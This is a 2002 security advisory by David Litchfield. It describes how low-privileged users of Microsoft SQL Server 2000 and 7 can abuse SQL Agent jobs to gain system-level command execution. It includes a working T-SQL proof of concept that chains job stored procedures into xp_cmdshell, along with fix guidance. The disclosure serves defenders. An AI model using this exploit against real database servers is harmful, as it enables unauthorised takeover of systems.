NGSSoftware Insight Security Research Advisory Name: SQL Agent Jobs Systems: Microsoft SQL Server 2000 and 7 Severity: High Risk Category: Privilege Escalation Vendor URL: http://www.microsoft.com/ Author: David Litchfield (davidat_private) Advisory URL: http://www.ngssoftware.com/advisories/mssql-esppu.txt Date: 15th August 2002 Advisory number: #NISR15002002B Description *********** With Microsoft SQL Server 2000 and 7 comes a "helper" service, the SQL Server agent. The Agent is responsible for restarting the database service if it stops for some reason, has a role to play in replication and runs scheduled jobs. As the public role can submit jobs to the SQL Agent to be executed a low privileged user may use this to gain control of the server. Details ******* The 'Public' role is allowed to create and submit jobs to be executed by the SQL Agent. To do this one would use a combination of several stored procedures in the msdb database such as sp_add_job and sp_add_job_step, etc. As the SQL Agent is considerably more privileged than a simple login, often running in the security context of the local system account, it must ensure that, when a T-SQL job is submitted to it, it can't be abused. To defend against this is performs a SETUSER N'guest' WITH NORESET This effectively drops its high level of privileges so no low privileged login can submit something like exec master..xp_cmdshell 'dir' However, this can be trivially bypassed by causing the SQL Agent to reconnect after it's dropped its privileges. They can use one of the vulnerable extended stored procedures discussed in the NGSSoftware Alert NISR15002002A (http://www.ngssoftware.com/advisories/mssql-esppu.txt). Proof of Concept **************** -- GetSystemOnSQL -- For this to work the SQL Agent should be running. -- Further, you'll need to change SERVER_NAME in -- sp_add_jobserver to the SQL Server of your choice -- -- David Litchfield -- (davidat_private) -- 18th July 2002 USE msdb EXEC sp_add_job @job_name = 'GetSystemOnSQL', @enabled = 1, @description = 'This will give a low privileged user access to xp_cmdshell', @delete_level = 1 EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL', @step_name = 'Exec my sql', @subsystem = 'TSQL', @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master''' EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL', @server_name = 'SERVER_NAME' EXEC sp_start_job @job_name = 'GetSystemOnSQL' Fix Information *************** NGSSoftware informed Microsoft of these issues in July. To prevent low privileged users from submitting jobs one should disallow public access to the Job related stored procedures in the MSDB database particularly sp_add_job sp_add_jobstep sp_add_jobserver sp_start_job Further Microsoft has released a patch that fixes several extended stored procedure vulnerabilities that can be used in conjuction with a job to gain extra privileges. Please see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/ bulletin/MS02-042.asp for more details.
This archive was generated by hypermail 2b30 : Fri Aug 16 2002 - 06:35:55 PDT